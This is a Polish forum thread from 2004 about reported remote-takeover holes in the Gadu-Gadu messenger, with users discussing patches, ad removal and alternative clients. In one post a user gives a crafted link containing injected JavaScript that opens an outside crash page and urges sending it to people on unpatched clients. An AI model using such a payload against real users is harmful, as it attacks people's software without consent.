logo elektroda
logo elektroda
X
logo elektroda
Szukanie Zaawansowane
logo elektroda
REKLAMA
REKLAMA
Adblock/uBlockOrigin/AdGuard mogą powodować znikanie niektórych postów z powodu nowej reguły.

Dziury w komunikatorze Gadu-Gadu

kosmita 18 Gru 2004 09:59 15541 39
REKLAMA
Zgłoś naruszenie prawa
Odpowiedz Fajne? Ranking DIY | Nowy temat
Powiadamiaj o nowych artykułach
  • "Gazeta Wyborcza": Poznańscy informatycy wykryli dziury w najpopularniejszym polskim komunikatorze Gadu-Gadu. Według informatyków, błędy w programie umożliwiały komuś z zewnątrz przejęcie całkowitej kontroli nad komputerem.

    Pozwalały na przejęcie hasła do komputera, podpatrzenie tego, co użytkownik robi w banku internetowym, kopiowanie plików czy wejście do sieci w firmie.

    Poznaniacy natychmiast skontaktowali się z autorem Gadu-Gadu, Łukaszem Fołtynem. Ze strony www.gadu-gadu.pl można już ściągnąć odpowiednią poprawkę do programu.


    źródło: http://info.onet.pl/1025930,18,item.html

    Fajne? Ranking DIY
    O autorze
    kosmita
    VIP Zasłużony dla elektroda
    Offline 
    kosmita napisał 4099 postów o ocenie 134, pomógł 216 razy. Mieszka w mieście Olsztyn. Jest z nami od 2002 roku.
  • REKLAMA
  • #2 1070340
    karqs
    Poziom 11  
    Posty: 11
    Hmm ciekawe czy taki problem jest tez w programie Konnekt? (www.konnekt.info) Ja tego uzywam. BTW polecam :)


    Pozdro!
  • REKLAMA
  • #3 1070425
    solecki.m
    Poziom 26  
    Posty: 736
    Pomógł: 75
    Ocena: 122
    Tosz to można zassać poprawioną wersję GG i problem znika...
  • #4 1070594
    qryszard
    Poziom 21  
    Posty: 348
    Pomógł: 35
    Ocena: 76
    A może jest to robione celoeo ??
  • #5 1070724
    omen_s
    Poziom 19  
    Posty: 424
    Pomógł: 4
    Ocena: 9
    hehe i znowu poznaniacy wykryli kolejną dziurę w programie :)
  • #6 1072285
    tomus2k
    Poziom 27  
    Posty: 771
    Pomógł: 89
    Ocena: 216
    gadu-gadu ma z 1000 dziur. A a co najmniej pięciu mogę powiedzieć że są celowe. Np jedną z takich dziur odbiór reklam... można wykożystać do spamu użytkowników gg. Pewnie inne komunikatory z bajerami mają podbnie.
  • #7 1072325
    zodiak318
    Poziom 34  
    Posty: 2366
    Pomógł: 249
    Ocena: 306
    [quote="tomus2k"] Np jedną z takich dziur odbiór reklam... można wykożystać do spamu użytkowników gg.quote]

    Już dawno wyłączyłem reklamy w GG a to banalnie proste :)
  • #8 1072515
    krychast
    Poziom 20  
    Posty: 1183
    Pomógł: 11
    Ocena: 159
    ja mam tlena i jest sto razy lepszy niż te gg
  • #9 1072721
    boulli
    Poziom 15  
    Posty: 118
    Pomógł: 10
    Ocena: 5
    Zodiak możesz zdradzić swoj sposób wycięcia reklam z gg ?
  • REKLAMA
  • #10 1072745
    Marekzenio
    Poziom 20  
    Posty: 494
    Pomógł: 12
    Ocena: 22
    Sciagnij Power Project lub wtyczke banner killer i po reklamach
  • REKLAMA
  • #11 1073275
    Kapsis
    Poziom 25  
    Posty: 940
    Pomógł: 14
    Ocena: 16
    jest juz nowe gg z niby "lata" zainstalowalem wlasnie

    Dodano po 43 [sekundy]:

    jest juz nowe gg z niby "łatą" zainstalowalem wlasnie
  • #12 1073786
    koval_s
    Poziom 18  
    Posty: 253
    Pomógł: 3
    Ocena: 20
    Ale te "pyry" to pożyteczne bestie, takie inteligentne i pożyteczne, nie to co nasze posły z Sejmu, ino gadać umią
  • #13 1073804
    jaro18
    Poziom 16  
    Posty: 256
    Pomógł: 1
    Ocena: 10
    Komunikator gg ma mnustwo dziur więkrzość z nich pewnie z was juz dawno zauważyło prubójąc zdobyc hasło chociażby kolegi czy koleżanki. Moim zdaniem nie są to dziury celowe ale wynikające z braku dopracowania komunikatora z czasem będeą znikały ale na nowe rozwiązania pojawią się drugie.
  • #15 1075703
    Konto nie istnieje
    Konto nie istnieje  
  • #16 1075720
    Kapsis
    Poziom 25  
    Posty: 940
    Pomógł: 14
    Ocena: 16
    taki przypadek jest bardzo czesty.pytanie tylko po co komus sie wlamywac i sie cieszyc ze sie jest na czyims numerze
  • #17 1076116
    karqs
    Poziom 11  
    Posty: 11
    Ja juz dawno rzucilem GG na rzecz innego komunikatora, innym tez to polecam. Tlen mi osobiscie sie nie podoba (jakos to wszystko scisniete i nieprzyjemna imo). Fakt jest taki ze 'niezalezne' programy do komunikacji sa bardziej rozwijane niz GG, nie maja reklam, sa wygodniejsze itd...
  • #18 1076296
    cinekk
    GSM Product Supporter
    Posty: 1512
    Pomógł: 170
    Ocena: 10
    Sądze że jakby tak porządnie wziąść sie za Tlen to tam także możnaby wiele dziur znaleźć... niestety problem przepełnienia stosu i nadpisania pamięci występuje w praktycznie każdym programie i ilość wykrytych błędów i ich możliwe wykorzystanie zależy tylko od tego jak bardzo rozeznana jest osoba która ich szuka...

    A propos wyciągnięcia hasła do czyjegoś gg którego profil jest zapisany na komputerze a wy macie do tego dostęp... takiego problmu praktycznie nie da sie uniknąć... proces kodowania da sie w tym przypadku odwrócić bardzo łatwo i w sumie tutaj jest minus gg ale trzeba pamiętać także, że nawet wprowadzenie nowszego systemu kodowania np. MD5 i tak nic nie da bo ciągle będziemy mieli dostęp do pliku gdzie te hasło w zakodowanej postaci zostało zapisane a niestety sama idea zapamiętania hasła do profilu gg, oraz samego konta gg musi polegać na tym, że będzie one gdzieś na naszym komputerze. Jedyna rada, profil chronić hasłem... ale nigdy nie wybierać opcji zapamiętywania hasła do samego gg, i hasło do profilu musi sie różnić od tego do gg.
  • #19 1076812
    djlj24
    Spec od car audio
    Posty: 13533
    Pomógł: 1104
    Ocena: 1321
    Jest jedno radykalne rozwiązanie. Nie używać komunikatora :D
  • #20 1077782
    k.marcin
    Poziom 18  
    Posty: 381
    Pomógł: 1
    Ocena: 26
    a mi sie cos zdaje ze mi przez gg trojany wlazily bo co wyczyscilem kompa bylo ok i po wlaczeniu GG zaraz jakies reklamy, strony.. spam.. zaraz zainstaluje nowa wersję i zobaczymy czy bedzie OK

    dali plame z tym GG............

    pozdro2All.
    Marcin
  • #21 1078221
    cinekk
    GSM Product Supporter
    Posty: 1512
    Pomógł: 170
    Ocena: 10
    k.marcin napisał:
    a mi się cos zdaje ze mi przez gg trojany wlazily bo co wyczyscilem kompa bylo ok i po wlaczeniu GG zaraz jakies reklamy, strony.. spam.. zaraz zainstaluje nowa wersję i zobaczymy czy bedzie OK

    dali plame z tym GG............

    pozdro2All.
    Marcin


    Taaa a świstak siedzi i zawija je w te sreberka... ;-)
  • #22 1079150
    kosmam
    Poziom 12  
    Posty: 27
    Ocena: 2
    k.marcin napisał:
    a mi się cos zdaje ze mi przez gg trojany wlazily bo co wyczyscilem kompa bylo ok i po wlaczeniu GG zaraz jakies reklamy, strony.. spam.. zaraz zainstaluje nowa wersję i zobaczymy czy bedzie OK

    A świstak siedzi, bo sreberka były z przemytu :)).

    Te reklamy to celowo - ale w ilości jedna na jedno włączenie gg.

    A ja używam ekg i łamię prawo! Podobnie, jak userzy PowerGG, FreeGG, Kadu i dowolnych innych programów...

    http://www.gadu-gadu.pl/regulamin.htm napisał:
    Korzystanie z serwisu Gadu-Gadu jest dozwolone wyłącznie za pomocą programu Gadu-Gadu. Korzystanie z serwisu Gadu-Gadu za pomocą innych aplikacji, jak również za pomocą zmodyfikowanego programu Gadu-Gadu będzie traktowane jako naruszenie regulaminu.
  • #23 1080105
    krzys-iek
    Poziom 20  
    Posty: 668
    Pomógł: 9
    Ocena: 82
    Kod: text Rozwiń Zaznacz wszystko Kopiuj do schowka
    www.po"style=background-image:url(javascript:document.write('%3cscript%3ewindow%2Eopen%28%22http%3A%2F%2Fraus%2Ede%2Fcrashme%22%29%3C%2fscript%3e'));".pl


    poprostu wyslij to do osoby ze starym GG :D :sm19:
  • #24 1080112
    Kapsis
    Poziom 25  
    Posty: 940
    Pomógł: 14
    Ocena: 16
    a co to robi ? :D widze jakisz crash w maszynopisie:P
  • #25 1080846
    krzys-iek
    Poziom 20  
    Posty: 668
    Pomógł: 9
    Ocena: 82
    raus.de/crashme odpala, dopiero jak poslalem pewnym osobom taki "zonk" to wgrali patcha... widac trzeba po chlopsku wytlumaczyc. Hacking.pl - ktos cos innego juz zrobil... mniej ciekawego :)

    w sumie poczatek mozesz zmienic na www.aaaavfvsd a koniec .de np, chodzi o przetworzanie linkow zapewne.
  • #26 1081408
    k.marcin
    Poziom 18  
    Posty: 381
    Pomógł: 1
    Ocena: 26
    a moze i siedzi bo sreberkabyły z przemytu :D trojany nadal mi włażą chociaz mam firewalla jakiegos programowego :) a gg juz uaktualnione :>
  • #27 1082271
    longines
    Poziom 26  
    Posty: 730
    Pomógł: 78
    Ocena: 38
    Trzeba używać Mirandy, a nie dziurawego kitu ;-)
  • #28 1082277
    Kapsis
    Poziom 25  
    Posty: 940
    Pomógł: 14
    Ocena: 16
    z tego co wiem to uzywanie mirandy[z podlaczeniem sie pod konto gg] tez jest wbrew regulaminowi gg :D
  • #29 1082447
    longines
    Poziom 26  
    Posty: 730
    Pomógł: 78
    Ocena: 38
    Kapsis napisał:
    z tego co wiem to uzywanie mirandy[z podlaczeniem się pod konto gg] tez jest wbrew regulaminowi gg :D


    Dokładnie tak :D Ale zauważ, że dzieki Mirandzie wcale nie muszę łamać żadnego z postanowień regulaminu GG - gdy korzystam z alternatywnych serwerów GG, do których team GG nie ma prawa :-)

    A wypuszczanie bubli z błędami, pozwalającymi przejąć kontrolę nad komputerem jest legalne? ;-)
  • #30 1082481
    Kapsis
    Poziom 25  
    Posty: 940
    Pomógł: 14
    Ocena: 16
    tez mialem sie przesiasc na mirande,:D,podobno nawet mniej z ramu pobiera :D
Odpowiedz Fajne? Ranking DIY | Nowy temat
Powiadamiaj o nowych artykułach
Zgłoś naruszenie prawa

Podsumowanie tematu

✨ Poznańscy informatycy wykryli poważne luki bezpieczeństwa w komunikatorze Gadu-Gadu, które umożliwiały zdalne przejęcie kontroli nad komputerem, w tym kradzież haseł, podgląd aktywności w bankowości internetowej, kopiowanie plików oraz dostęp do sieci firmowej. Autor programu, Łukasz Fołtyn, szybko udostępnił poprawkę eliminującą te błędy. Użytkownicy dyskutowali o licznych dziurach w GG, niektóre z nich mogą być celowo wprowadzone, np. do wyświetlania reklam, które można blokować za pomocą narzędzi typu Power Project lub wtyczek banner killer. Wskazywano na ryzyko infekcji trojanami i spamem powiązanym z używaniem GG. Alternatywne komunikatory takie jak Tlen, Miranda, Kadu czy PowerGG są postrzegane jako bardziej bezpieczne i pozbawione reklam, choć również mogą mieć własne luki. Poruszono problem zapamiętywania haseł w plikach lokalnych, co stanowi słabość zabezpieczeń GG. Użytkownicy zalecają ostrożność, niekorzystanie z opcji zapamiętywania hasła oraz regularne aktualizacje systemu i samego komunikatora. Niektórzy zgłaszali problemy z działaniem GG na Windows XP bez zainstalowanych Service Packów. Wskazano również na możliwość wykorzystania alternatywnych serwerów GG przez program Miranda, co może omijać regulamin GG.
Wygenerowane przez model językowy.
Popularne dzisiaj
REKLAMA